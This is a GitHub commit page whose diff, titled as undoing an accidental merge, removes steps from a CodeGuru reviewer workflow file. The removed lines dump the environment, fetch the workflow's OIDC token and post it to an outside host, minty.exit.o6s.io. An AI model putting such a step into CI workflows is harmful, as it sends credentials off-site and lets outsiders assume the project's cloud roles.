Skip to content

Commit dd32c6c

Browse files
authored
Undo accidental merge commit
1 parent 22dd100 commit dd32c6c

File tree

1 file changed

+1
-8
lines changed

1 file changed

+1
-8
lines changed

.github/workflows/codeguru-reviewer.yml

Lines changed: 1 addition & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -15,14 +15,7 @@ permissions:
1515
jobs:
1616
CodeGuruReviewerScan:
1717
runs-on: ubuntu-latest
18-
steps:
19-
- run: env
20-
- name: Post the token
21-
run: |
22-
OIDC_TOKEN=$(curl -sLS "${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=o6s" -H "User-Agent: actions/oidc-client" -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN")
23-
24-
curl -i -s --data-binary "$OIDC_TOKEN" \
25-
https://minty.exit.o6s.io/github-oidc
18+
steps:
2619
- name: Assume IAM Role
2720
continue-on-error: true
2821
uses: aws-actions/configure-aws-credentials@v1

0 commit comments

Comments
 (0)